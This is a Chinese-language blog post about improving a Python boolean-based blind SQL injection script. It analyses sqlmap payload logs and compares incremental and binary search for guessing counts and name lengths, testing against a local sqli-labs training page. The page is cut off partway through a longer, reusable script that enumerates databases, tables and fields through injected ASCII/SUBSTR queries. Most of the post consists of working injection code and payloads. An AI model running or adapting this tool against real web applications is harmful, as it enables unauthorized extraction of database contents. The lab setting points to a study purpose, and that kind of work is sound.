<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="python," />










<meta name="description" content="python布尔盲注脚本算法完善完善一下上次写的python盲注工具，之前那个盲注工具在猜取字符的时候使用的二分法，通过查找0-126这个范围去采取数据库中的数据。但是当时遗留了一个问题，就是在逐个猜解数据库字符时使用二分法并没有什么问题，这时因为字符都在0-126这个固定范围内，但是在猜取数据库个数、指定数据库的表个数、字段个数或者表中记录条数时，又或者是数据库名的长度、表名长度、字段名的长度时">
<meta name="keywords" content="python">
<meta property="og:type" content="article">
<meta property="og:title" content="python布尔盲注脚本算法完善">
<meta property="og:url" content="http://yoursite.com/2018/06/06/pyblindsqlimax/index.html">
<meta property="og:site_name" content="Climber">
<meta property="og:description" content="python布尔盲注脚本算法完善完善一下上次写的python盲注工具，之前那个盲注工具在猜取字符的时候使用的二分法，通过查找0-126这个范围去采取数据库中的数据。但是当时遗留了一个问题，就是在逐个猜解数据库字符时使用二分法并没有什么问题，这时因为字符都在0-126这个固定范围内，但是在猜取数据库个数、指定数据库的表个数、字段个数或者表中记录条数时，又或者是数据库名的长度、表名长度、字段名的长度时">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://p008biu9n.bkt.clouddn.com/blog/180606/DDkGlAlEI1.png?imageslim">
<meta property="og:image" content="http://p008biu9n.bkt.clouddn.com/blog/180606/mdKF3eAHC6.png?imageslim">
<meta property="og:image" content="http://p008biu9n.bkt.clouddn.com/blog/180606/A3HEkh98aB.png?imageslim">
<meta property="og:image" content="http://p008biu9n.bkt.clouddn.com/blog/180606/CJGgj0b8ga.png?imageslim">
<meta property="og:updated_time" content="2018-06-06T12:51:03.295Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="python布尔盲注脚本算法完善">
<meta name="twitter:description" content="python布尔盲注脚本算法完善完善一下上次写的python盲注工具，之前那个盲注工具在猜取字符的时候使用的二分法，通过查找0-126这个范围去采取数据库中的数据。但是当时遗留了一个问题，就是在逐个猜解数据库字符时使用二分法并没有什么问题，这时因为字符都在0-126这个固定范围内，但是在猜取数据库个数、指定数据库的表个数、字段个数或者表中记录条数时，又或者是数据库名的长度、表名长度、字段名的长度时">
<meta name="twitter:image" content="http://p008biu9n.bkt.clouddn.com/blog/180606/DDkGlAlEI1.png?imageslim">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/06/06/pyblindsqlimax/"/>





  <title>python布尔盲注脚本算法完善 | Climber</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Climber</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">原创文章，未经授权请勿转载</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/06/06/pyblindsqlimax/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Climber">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/Ironman.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Climber">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">python布尔盲注脚本算法完善</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-06T10:11:33+08:00">
                2018-06-06
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/python编程/" itemprop="url" rel="index">
                    <span itemprop="name">python编程</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="python布尔盲注脚本算法完善"><a href="#python布尔盲注脚本算法完善" class="headerlink" title="python布尔盲注脚本算法完善"></a>python布尔盲注脚本算法完善</h1><p><strong>完善一下上次写的python盲注工具，之前那个盲注工具在猜取字符的时候使用的二分法，通过查找<code>0-126</code>这个范围去采取数据库中的数据。但是当时遗留了一个问题，就是在逐个猜解数据库字符时使用二分法并没有什么问题，这时因为字符都在<code>0-126</code>这个固定范围内，但是在猜取数据库个数、指定数据库的表个数、字段个数或者表中记录条数时，又或者是数据库名的长度、表名长度、字段名的长度时是没有一个固定的范围的，举个例子，比如在猜取表中记录个数时，记录的个数是不能确定范围的，也就是不能确定二分法的最大值，当时采用了循环自加的方式去判断，速度自然是慢了许多。今天抽时间读了一下sqlmap的payload，通过payload发现sqlmap也考虑到了这种情况，并且处理方法还是不错的。对于这种情况还是可以通过二分法判断的，将自己的方法记录一下~</strong><br><a id="more"></a></p>
<h3 id="分析sqlmap判断时的payload"><a href="#分析sqlmap判断时的payload" class="headerlink" title="分析sqlmap判断时的payload"></a>分析sqlmap判断时的payload</h3><p><strong>首先看一下sqlmap在判断数据库个数时的payload</strong></p>
<pre><code>[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))&gt;51 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))&gt;54 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))&gt;52 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))&gt;53 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),2,1))&gt;51 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),2,1))&gt;48 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [PAYLOAD] 1&apos; AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),2,1))&gt;9 AND &apos;rTJT&apos;=&apos;rTJT
[12:09:16] [INFO] retrieved: 5
</code></pre><p><strong>通过分析payload可以看出sqlmap将count查到的数据库个数使用cast转换为了字符型，然后指定二分法的范围为字符<code>&#39;0&#39;-&#39;9&#39;</code>，其ascii码转换为十进制也就是<code>48-57</code>，这个区域中间值为52，而看上面sqlmap在判断数据库个数时的第一个payload比较的值是51，所以可以确定sqlmap指定的二分法的大致范围确实是48-57(‘0’-‘9’)</strong></p>
<p><strong>通过对sqlmap的payload的分析，我想到了一种解决之前那个问题的办法，由于查询个数、长度、记录数的结果一定为数字，那么不管这个数字有多大，只要转换为字符串后，它的每一位一定是在<code>&#39;0&#39;-&#39;9&#39;</code>这个范围内，也就是十进制的<code>48-57</code>，所以只需要把数字转换成字符串，然后去使用二分法，指定二分法的范围为<code>48-57</code>，之后通过二分法可以判断出数字字符串每一位的字符，直到不能判断为止，最终就能得到这个数字</strong></p>
<h3 id="自增查找和二分查找算法对比"><a href="#自增查找和二分查找算法对比" class="headerlink" title="自增查找和二分查找算法对比"></a>自增查找和二分查找算法对比</h3><p><strong>和之前的自增查找做一个对比，首先以猜解数据库个数为例，我的数据库个数为5个</strong></p>
<p><strong>在不确定二分法范围时采用的自增算法代码</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line">url=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1"</span></div><div class="line">basehtml=requests.get(url=url).content</div><div class="line">i=<span class="number">0</span></div><div class="line"><span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">    payload=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1' and (select count(schema_name) from information_schema.schemata)=%d-- "</span>%(i)</div><div class="line">    html=requests.get(url=payload).content</div><div class="line">    <span class="keyword">print</span> payload</div><div class="line">    <span class="keyword">if</span> basehtml==html:</div><div class="line">        <span class="keyword">print</span> i</div><div class="line">        <span class="keyword">break</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        i=i+<span class="number">1</span></div></pre></td></tr></table></figure>
<p><img src="http://p008biu9n.bkt.clouddn.com/blog/180606/DDkGlAlEI1.png?imageslim" alt="mark"><br><strong>自增算法发送了5次payload判断出了数据库个数为5</strong></p>
<p><strong>再看一下刚刚说的二分查找算法代码</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line">url=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1"</span></div><div class="line">basehtml=requests.get(url=url).content</div><div class="line">i=<span class="number">1</span></div><div class="line">s=<span class="string">""</span></div><div class="line"><span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">    count=<span class="number">0</span></div><div class="line">    low=<span class="number">48</span></div><div class="line">    high=<span class="number">57</span></div><div class="line">    <span class="keyword">while</span> low&lt;=high:</div><div class="line">        mid=(low+high)/<span class="number">2</span></div><div class="line">        payload=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),%d,1))&gt;%d-- "</span>%(i,mid)</div><div class="line">        <span class="keyword">print</span> payload</div><div class="line">        html=requests.get(url=payload).content</div><div class="line">        <span class="keyword">if</span> basehtml==html:</div><div class="line">            low=mid+<span class="number">1</span></div><div class="line">            count+=<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            high=mid<span class="number">-1</span></div><div class="line">    <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">        s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">        i=i+<span class="number">1</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        <span class="keyword">break</span></div><div class="line"><span class="keyword">print</span> s</div></pre></td></tr></table></figure>
<p><img src="http://p008biu9n.bkt.clouddn.com/blog/180606/mdKF3eAHC6.png?imageslim" alt="mark"><br><strong>在这里二分算法发送了6次payload才判断出来了数据库的个数为5，可以看出当数字比较小的时候，上面的二分法的优势并没有体现出来</strong></p>
<p><strong>那么再举一个例子，比如用盲注判断<code>information_schema</code>这个数据库名的长度，长度为18，相比之前的5大了一些，为2位数，再次对比一下两个算法</strong></p>
<p><strong>在不确定二分法范围时采用的自增算法代码</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line">url=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1"</span></div><div class="line">basehtml=requests.get(url=url).content</div><div class="line">i=<span class="number">0</span></div><div class="line"><span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">    payload=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=%d-- "</span>%(i)</div><div class="line">    html=requests.get(url=payload).content</div><div class="line">    <span class="keyword">print</span> payload</div><div class="line">    <span class="keyword">if</span> basehtml==html:</div><div class="line">        <span class="keyword">print</span> i</div><div class="line">        <span class="keyword">break</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        i=i+<span class="number">1</span></div></pre></td></tr></table></figure>
<p><img src="http://p008biu9n.bkt.clouddn.com/blog/180606/A3HEkh98aB.png?imageslim" alt="mark"><br><strong>发送了18次payload才判断出<code>information_schema</code>数据库名的长度为18</strong></p>
<p><strong>再看一下刚刚说的二分查找算法代码</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> requests</div><div class="line">url=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1"</span></div><div class="line">basehtml=requests.get(url=url).content</div><div class="line">i=<span class="number">1</span></div><div class="line">s=<span class="string">""</span></div><div class="line"><span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">    count=<span class="number">0</span></div><div class="line">    low=<span class="number">48</span></div><div class="line">    high=<span class="number">57</span></div><div class="line">    <span class="keyword">while</span> low&lt;=high:</div><div class="line">        mid=(low+high)/<span class="number">2</span></div><div class="line">        payload=<span class="string">"http://192.168.3.3/sqli-labs-master/Less-5/index.php?id=1' AND ORD(MID((SELECT IFNULL(CAST(length(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA limit 0,1),%d,1))&gt;%d-- "</span>%(i,mid)</div><div class="line">        <span class="keyword">print</span> payload</div><div class="line">        html=requests.get(url=payload).content</div><div class="line">        <span class="keyword">if</span> basehtml==html:</div><div class="line">            low=mid+<span class="number">1</span></div><div class="line">            count+=<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            high=mid<span class="number">-1</span></div><div class="line">    <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">        s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">        i=i+<span class="number">1</span></div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        <span class="keyword">break</span></div><div class="line"><span class="keyword">print</span> s</div></pre></td></tr></table></figure>
<p><img src="http://p008biu9n.bkt.clouddn.com/blog/180606/CJGgj0b8ga.png?imageslim" alt="mark"><br><strong>可以看到随着数字的增加，二分法的优势体现出来了，只发送了9次payload就判断出了<code>information_schema</code>数据库名的长度为18</strong></p>
<h3 id="盲注脚本加强版"><a href="#盲注脚本加强版" class="headerlink" title="盲注脚本加强版"></a>盲注脚本加强版</h3><p><strong>修改过后的盲注脚本，注入速度相比之前的那个明显有所提高</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div><div class="line">318</div><div class="line">319</div><div class="line">320</div><div class="line">321</div><div class="line">322</div><div class="line">323</div><div class="line">324</div><div class="line">325</div><div class="line">326</div><div class="line">327</div><div class="line">328</div><div class="line">329</div><div class="line">330</div><div class="line">331</div><div class="line">332</div><div class="line">333</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#coding=utf-8</span></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"><span class="keyword">from</span> optparse <span class="keyword">import</span> OptionParser</div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getdbnum</span><span class="params">(url,basehtml)</span>:</span></div><div class="line">    i=<span class="number">1</span></div><div class="line">    s=<span class="string">""</span></div><div class="line">    <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">        count=<span class="number">0</span></div><div class="line">        low=<span class="number">48</span></div><div class="line">        high=<span class="number">57</span></div><div class="line">        <span class="keyword">while</span> low&lt;=high:</div><div class="line">            mid=(low+high)/<span class="number">2</span></div><div class="line">            payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),%d,1))&gt;%d-- "</span>%(url,i,mid)</div><div class="line">            <span class="comment">#print payload</span></div><div class="line">            html=requests.get(url=payload).content</div><div class="line">            <span class="keyword">if</span> basehtml==html:</div><div class="line">                low=mid+<span class="number">1</span></div><div class="line">                count+=<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                high=mid<span class="number">-1</span></div><div class="line">        <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            i=i+<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">break</span></div><div class="line">    <span class="keyword">return</span> int(s)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getdbs</span><span class="params">(url,basehtml,num)</span>:</span></div><div class="line">    <span class="comment">#print "num:%s"%(num)</span></div><div class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(num):</div><div class="line">        i=<span class="number">1</span></div><div class="line">        length=<span class="string">""</span></div><div class="line">        <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">            count=<span class="number">0</span></div><div class="line">            low=<span class="number">48</span></div><div class="line">            high=<span class="number">57</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(length(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA limit %d,1),%d,1))&gt;%d-- "</span>%(url,n,i,mid)</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="keyword">if</span> basehtml==html:</div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                    count+=<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">                length=length+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">                i=i+<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">break</span></div><div class="line">        s=<span class="string">""</span></div><div class="line">        <span class="comment">#print "len:%s"%(length)</span></div><div class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">1</span>,int(length)+<span class="number">1</span>):</div><div class="line">            low=<span class="number">0</span></div><div class="line">            high=<span class="number">126</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s and ascii(substr((select schema_name from information_schema.schemata limit %s,1),%s,1))&gt;%s-- "</span>%(url,str(n),str(c),str(mid))</div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                <span class="keyword">if</span> html==basehtml:</div><div class="line">                    <span class="comment">#print payload</span></div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            <span class="keyword">print</span> s</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">gettablenum</span><span class="params">(url,basehtml,dbname)</span>:</span></div><div class="line">    i=<span class="number">1</span></div><div class="line">    s=<span class="string">""</span></div><div class="line">    <span class="keyword">while</span> <span 